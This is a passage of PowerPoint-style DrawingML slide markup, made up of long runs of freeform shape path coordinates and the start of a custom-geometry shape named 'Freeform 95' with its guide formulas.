                      <a:pt x="649" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="673" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="681" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="690" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="689" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="680" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="658" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="643" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="613" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="602" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="596" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="584" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="649" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="613" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="596" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="602" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="621" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="575" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="591" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="592" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="585" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="571" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="563" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="539" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="524" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="505" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="459" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="437" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="353" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="345" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="422" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="438" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="445" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="434" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="386" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="429"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="412"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3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089" name="Freeform 95"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="294" y="2371"/>
                <a:ext cx="499" cy="209"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1527"/>
                  <a:gd name="T1" fmla="*/ 0 h 638"/>
                  <a:gd name="T2" fmla="*/ 0 w 1527"/>
                  <a:gd name="T3" fmla="*/ 0 h 638"/>
                  <a:gd name="T4" fmla="*/ 0 w 1527"/>
                  <a:gd name="T5" fmla="*/ 0 h 638"/>
                  <a:gd name="T6" fmla="*/ 0 w 1527"/>
                  <a:gd name="T7" fmla="*/ 0 h 638"/>
                  <a:gd name="T8" fmla="*/ 0 w 1527"/>
                  <a:gd name="T9" fmla="*/ 0 h 638"/>
                  <a:gd name="T10" fmla="*/ 0 w 1527"/>
                  <a:gd name="T11" fmla="*/ 0 h 638"/>
                  <a:gd name="T12" fmla="*/ 0 w 1527"/>
                  <a:gd name="T13" fmla="*/ 0 h 638"/>
                  <a:gd name="T14" fmla="*/ 0 w 1527"/>
                  <a:gd name="T15" fmla="*/ 0 h 638"/>
                  <a:gd name="T16" fmla="*/ 0 w 1527"/>
                  <a:gd name="T17" fmla="*/ 0 h 638"/>
                  <a:gd name="T18" fmla="*/ 0 w 1527"/>
                  <a:gd name="T19" fmla="*/ 0 h 638"/>
                  <a:gd name="T20" fmla="*/ 0 w 1527"/>
                  <a:gd name="T21" fmla="*/ 0 h 638"/>
                  <a:gd name="T22" fmla="*/ 0 w 1527"/>
                  <a:gd name="T23" fmla="*/ 0 h 638"/>
                  <a:gd name="T24" fmla="*/ 0 w 1527"/>
                  <a:gd name="T25" fmla="*/ 0 h 638"/>
                  <a:gd name="T26" fmla="*/ 0 w 1527"/>
                  <a:gd name="T27" fmla="*/ 0 h 638"/>
                  <a:gd name="T28" fmla="*/ 0 w 1527"/>
                  <a:gd name="T29" fmla="*/ 0 h 638"/>
                  <a:gd name="T30" fmla="*/ 0 w 1527"/>
                  <a:gd name="T31" fmla="*/ 0 h 638"/>
                  <a:gd name="T32" fmla="*/ 0 w 1527"/>
                  <a:gd name="T33" fmla="*/ 0 h 638"/>
                  <a:gd name="T34" fmla="*/ 0 w 1527"/>
                  <a:gd name="T35" fmla="*/ 0 h 638"/>
                  <a:gd name="T36" fmla="*/ 0 w 1527"/>
                  <a:gd name="T37" fmla="*/ 0 h 638"/>
                  <a:gd name="T38" fmla="*/ 0 w 1527"/>
                  <a:gd name="T39" fmla="*/ 0 h 638"/>
                  <a:gd name="T40" fmla="*/ 0 w 1527"/>
                  <a:gd name="T41" fmla="*/ 0 h 638"/>
                  <a:gd name="T42" fmla="*/ 0 w 1527"/>
                  <a:gd name="T43" fmla="*/ 0 h 638"/>
                  <a:gd name="T44" fmla="*/ 0 w 1527"/>
                  <a:gd name="T45" fmla="*/ 0 h 638"/>
                  <a:gd name="T46" fmla="*/ 0 w 1527"/>
                  <a:gd name="T47" fmla="*/ 0 h 638"/>
                  <a:gd name="T48" fmla="*/ 0 w 1527"/>
